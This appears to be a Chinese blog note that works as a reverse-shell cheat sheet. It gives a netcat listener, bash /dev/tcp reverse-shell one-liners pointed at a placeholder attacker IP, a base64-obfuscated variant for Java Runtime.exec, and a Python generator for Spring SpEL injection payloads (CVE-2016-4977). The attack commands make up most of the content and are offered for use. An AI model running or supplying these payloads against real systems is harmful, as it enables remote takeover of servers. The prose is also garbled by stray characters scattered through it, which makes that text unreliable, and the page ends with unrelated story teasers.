反彈shell

1. 在A機器打開偵聽端口

nc -l 9333

2.在B機器反彈shell

bash -i >& /dev/tcp/x.x.x.x/9333 0>&1

對于有些機器默認(rèn)的shell不是bash的話墓塌,則應(yīng)使用

bash -c "bash -i >& /dev/tcp/x.x.x.x/9333 0>&1"

其中,x.x.x.x請?zhí)鎿Q為A機器的ip
此時桃纯,查看A機器的shell已經(jīng)打開B機器的shell披坏,可以執(zhí)行相應(yīng)的shell操作

stonedeMacBook-Pro:~ stone$ nc -l 9333
root@6ed1367bab09:/usr/local/tomcat#

3.java反彈shell的限制與繞過方式

http://www.jackson-t.ca/runtime-exec-payloads.html
1)將命令base64編碼

echo 'bash -i >& /dev/tcp/127.0.0.1/9333 0>&1'|base64

2)得到在shell終端中可以執(zhí)行的反彈shell指令

{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTMzMyAwPiYxCg==}|{base64,-d}|{bash,-i}

TODO:在(1)中編碼的部分已經(jīng)編碼了bash -i,為啥在(2)中還要再來一次呢,不求甚解
3)在java RCE中再封裝一層伞梯,得到

bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMjcuMC4wLjEvOTMzMyAwPiYxCg==}|{base64,-d}|{bash,-i}

4)如果編碼格式過不了,可以進一步編碼

poc = '${T(java.lang.Runtime).getRuntime().exec(T(java.lang.Character).toString(%s)' % ord(message[0])

for ch in message[1:]:
   poc += '.concat(T(java.lang.Character).toString(%s))' % ord(ch)

poc += ')}'

print(poc)

https://github.com/vulhub/vulhub/tree/master/spring/CVE-2016-4977

https://xz.aliyun.com/t/2549

最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
  • 序言:七十年代末谜诫,一起剝皮案震驚了整個濱河市喻旷,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌且预,老刑警劉巖,帶你破解...
    沈念sama閱讀 218,122評論 6 505
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件锋谐,死亡現(xiàn)場離奇詭異截酷,居然都是意外死亡,警方通過查閱死者的電腦和手機迂苛,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 93,070評論 3 395
  • 文/潘曉璐 我一進店門三幻,熙熙樓的掌柜王于貴愁眉苦臉地迎上來,“玉大人赌髓,你說我怎么就攤上這事∫囊埃” “怎么了?”我有些...
    開封第一講書人閱讀 164,491評論 0 354
  • 文/不壞的土叔 我叫張陵悯搔,是天一觀的道長舌仍。 經(jīng)常有香客問我,道長铸豁,這世上最難降的妖魔是什么? 我笑而不...
    開封第一講書人閱讀 58,636評論 1 293
  • 正文 為了忘掉前任在刺,我火速辦了婚禮头镊,結(jié)果婚禮上,老公的妹妹穿的比我還像新娘相艇。我一直安慰自己,他們只是感情好坛芽,可當(dāng)我...
    茶點故事閱讀 67,676評論 6 392
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著欲鹏,像睡著了一般。 火紅的嫁衣襯著肌膚如雪赔嚎。 梳的紋絲不亂的頭發(fā)上,一...
    開封第一講書人閱讀 51,541評論 1 305
  • 那天尤误,我揣著相機與錄音结缚,去河邊找鬼。 笑死红竭,一個胖子當(dāng)著我的面吹牛喘落,可吹牛的內(nèi)容都是我干的最冰。 我是一名探鬼主播,決...
    沈念sama閱讀 40,292評論 3 418
  • 文/蒼蘭香墨 我猛地睜開眼暖哨,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了篇裁?” 一聲冷哼從身側(cè)響起,我...
    開封第一講書人閱讀 39,211評論 0 276
  • 序言:老撾萬榮一對情侶失蹤团甲,失蹤者是張志新(化名)和其女友劉穎往枣,沒想到半個月后,有當(dāng)?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體分冈,經(jīng)...
    沈念sama閱讀 45,655評論 1 314
  • 正文 獨居荒郊野嶺守林人離奇死亡,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內(nèi)容為張勛視角 年9月15日...
    茶點故事閱讀 37,846評論 3 336
  • 正文 我和宋清朗相戀三年集乔,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學(xué)時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片扰路。...
    茶點故事閱讀 39,965評論 1 348
  • 序言:一個原本活蹦亂跳的男人離奇死亡倔叼,死狀恐怖,靈堂內(nèi)的尸體忽然破棺而出丈攒,到底是詐尸還是另有隱情,我是刑警寧澤巡验,帶...
    沈念sama閱讀 35,684評論 5 347
  • 正文 年R本政府宣布,位于F島的核電站显设,受9級特大地震影響,放射性物質(zhì)發(fā)生泄漏捕捂。R本人自食惡果不足惜斗搞,卻給世界環(huán)境...
    茶點故事閱讀 41,295評論 3 329
  • 文/蒙蒙 一榜旦、第九天 我趴在偏房一處隱蔽的房頂上張望。 院中可真熱鬧景殷,春花似錦澡屡、人聲如沸。這莊子的主人今日做“春日...
    開封第一講書人閱讀 31,894評論 0 22
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽办绝。三九已至,卻和暖如春孕蝉,著一層夾襖步出監(jiān)牢的瞬間,已是汗流浹背腌逢。 一陣腳步聲響...
    開封第一講書人閱讀 33,012評論 1 269
  • 我被黑心中介騙來泰國打工, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留佳鳖,地道東北人。 一個月前我還...
    沈念sama閱讀 48,126評論 3 370
  • 正文 我出身青樓系吩,卻偏偏與公主長得像妒蔚,于是被迫代替她去往敵國和親。 傳聞我的和親對象是個殘疾皇子面睛,可洞房花燭夜當(dāng)晚...
    茶點故事閱讀 44,914評論 2 355